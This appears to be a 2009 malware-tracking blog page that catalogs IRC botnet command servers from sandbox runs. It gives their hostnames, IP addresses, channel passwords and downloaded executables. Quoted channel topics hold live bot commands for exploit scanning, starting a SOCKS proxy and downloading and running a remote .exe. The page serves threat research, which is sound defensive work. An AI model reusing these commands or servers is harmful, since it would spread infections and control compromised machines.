Month: May 2009

trotinet.cjb.net

Uncategorized

– IRC Conversations:
  190.41.252.100:6667
  Nick: USA|0064737
  Username: iycpimhdi
  Joined Channel: ##ddos##
– DNS Query: trotinet.cjb.net

Initiating SYN Stealth Scan against 190.41.252.100 [1680 ports] at 03:21
Discovered open port 25/tcp on 190.41.252.100
Discovered open port 21/tcp on 190.41.252.100
Discovered open port 31337/tcp on 190.41.252.100
Discovered open port 3128/tcp on 190.41.252.100
SYN Stealth Scan Timing: About 25.01% done; ETC: 03:23 (0:01:30 remaining)
Discovered open port 427/tcp ...

dci.sinip.es

* The following Host Name was requested from a host database:
  o dci.sinip.es

Remote Host     Port Number
dci.sinip.es    20000

NICK W3-0c9c[
USER uuoio “fo0.net” “lol” :uuoio
NICK W3-`u5bh
USER dgqaqp “fo9.net” “lol” :dgqaqp

* Outgoing Connections
  o Transport Protocol: TCP
  o Remote Address: 98.174.174.76
  o Remote Port: 20000
  o Connection Established: 0
  o Socket: 1372

irc2.revo-studios.com

Analysis of the file resources indicate the following possible country of origin: Russian Federation

Remote Host              Port Number
irc2.revo-studios.com    1034

Resolved irc2.revo-studios.com To 212.95.59.116
Resolved irc2.revo-studios.com To 72.8.167.148
Resolved irc2.revo-studios.com To 216.25.44.118
Resolved irc2.revo-studios.com To 72.20.24.9

78.109.16.250 (SSL connection, port 443)

[ DetectionInfo ]
* Filename: C:analyzerscanphoto1226.jpeg-www.myspace.com.
* Sandbox name: W32/Malware.
* Signature name: W32/Smalltroj.IBZS.
* Compressed: YES.
* TLS hooks: NO.
* Executable type: Application.
* Executable file structure: OK.
* Filetype: PE_I386.

[ General information ]
* Drops files in %WINSYS% folder.
* File length: 19968 bytes.
* MD5 hash: 2e65abd884a33faac83805de140a7ef6.

[ Changes to ...

mail.fucuzzy.com

– DNS Queries:
  Name                Query Type    Query Result     Successful    Protocol
  mail.fucuzzy.com    DNS_TYPE_A    209.205.196.2    1
– IRC Conversations:
  209.205.196.2:80
  Nick: [P00|USA|08114398]
  Username: XP-1867
  Joined Channel: #q47 with Password ^B^B^B^B
  Channel Topic for Channel #q47: “.asc -S -s |.j #br |.j #de |.j #dk |.j #fr |.j #it |.j #jp |.j #kr |.j #mx |.j #pl |.j #ru |.j #tw ...

t3ch.hqirc.com

– DNS Queries:
  Name              Query Type    Query Result    Successful    Protocol
  t3ch.hqirc.com    DNS_TYPE_A    66.252.24.30    1
+ Opened Listening Ports:
– IRC Conversations:
  66.252.24.30:6667
  Nick: USA|152381
  Username: xynbvl
  Joined Channel: ##HQz##
  Joined Channel: #eee
  Channel Topic for Channel #eee: “^socks4”
  Channel Topic for Channel ##HQz##: “^j #eee”
  Private Message to Channel #eee: “[SOCKS4]: Server started on: 192.168.0.2:11244.”

mm.esskil99.info

– DNS Queries:
  Name                Query Type    Query Result    Successful    Protocol
  mm.esskil99.info    DNS_TYPE_A    72.8.146.39     1
– HTTP Conversations:
  72.8.146.36:80 – [72.8.146.36]
  Request: GET /3.exe
  Response: 200 “OK”
– IRC Conversations:
  72.8.146.39:17766
  Nick: USA|907373
  Username: uwerqh
  Joined Channel: ##blast,##blast2 with Password fexa0fe
  Channel Topic for Channel ##blast2: “.advscan asn1smb 50 2 0 -r”
  Channel Topic for Channel ##blast: “.xa0d http://72.8.146.36/3.exe msd.exe ...

ns.ircstyle.net / zonetech.info (baadshah from #bottalk)

– DNS Queries:
  Name               Query Type    Query Result     Successful    Protocol
  ns.ircstyle.net    DNS_TYPE_A    67.43.232.35     1
  zonetech.info      DNS_TYPE_A    72.10.166.195    1
  …                  DNS_TYPE_A                     0
+ Opened Listening Ports:
– HTTP Conversations:
  72.10.166.195:80 – [zonetech.info]
  Request: GET /ll6.exe
  Response: 200 “OK”
  Request: GET /ns6.exe
  Response: 200 “OK”
– IRC Conversations:
  67.43.232.35:1867
  Nick: YPeeOlAX
  Username: tdfsck
  Joined Channel: #ns
  Channel Topic for Channel ...

flys.q8pilots.net

– DNS Queries:
  Name                 Query Type    Query Result     Successful    Protocol
  flys.q8pilots.net    DNS_TYPE_A    66.252.13.209    1
+ Opened Listening Ports:
– IRC Conversations:
  66.252.13.209:9682
  Nick: ][laMer][ebivli
  Username: ][laMer][ebivli
  Joined Channel: #l4mer#
  Channel Topic for Channel #l4mer#: “.asc asn2 150 5 0 -r -b -s”
  Private Message to Channel #l: “”